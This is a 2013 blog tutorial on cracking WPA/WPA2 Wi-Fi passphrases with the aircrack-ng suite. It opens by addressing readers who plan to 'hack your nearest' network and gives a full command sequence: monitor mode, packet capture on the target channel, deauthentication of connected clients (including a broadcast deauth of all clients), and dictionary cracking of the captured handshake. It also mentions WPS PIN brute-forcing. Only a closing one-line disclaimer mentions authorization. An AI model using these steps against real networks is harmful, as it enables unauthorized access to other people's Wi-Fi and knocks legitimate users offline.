Thursday, December 19, 2013

WPA / WPA2 Handshake Cracking WITH Dictionary using Aircrack-ng | How To | Wireless Hacking

Written by Pranshu Bajpai |  | LinkedIn

If you are planning to hack your nearest WPA/WPA2 network (with No WPS), I have two words for you: Good. Luck.

In all my experiments with penetration testing, I have found dictionary attacks on WPA/WPA2 handshakes to be the most annoying and futile exercises. This is because:
  • going through each word in a dictionary file containing millions of words is time-consuming.
  • success is not guaranteed (the passphrase may not be present in your dictionary).
During my experiments in India, the WiFi passphrases are usually a combination of Hindi and English words or a Hindu name which are, of course, not present in any dictionary that I download no matter how exhaustive it promises to be.

If you are still brave enough to try a dictionary attack on WPA handshake, here's the procedure.

How to launch a Dictionary Attack on WPA Handshake

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface
#airmon-ng start wlan0
This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.
#airodump-ng mon0
Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.
#airodump-ng -c6 mon0 -w capture_file
Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:
#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:
#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:
#aircrack-ng capture_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

Now say your prayers and hope the passphrase is present in the dictionary you chose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

No comments:

Post a Comment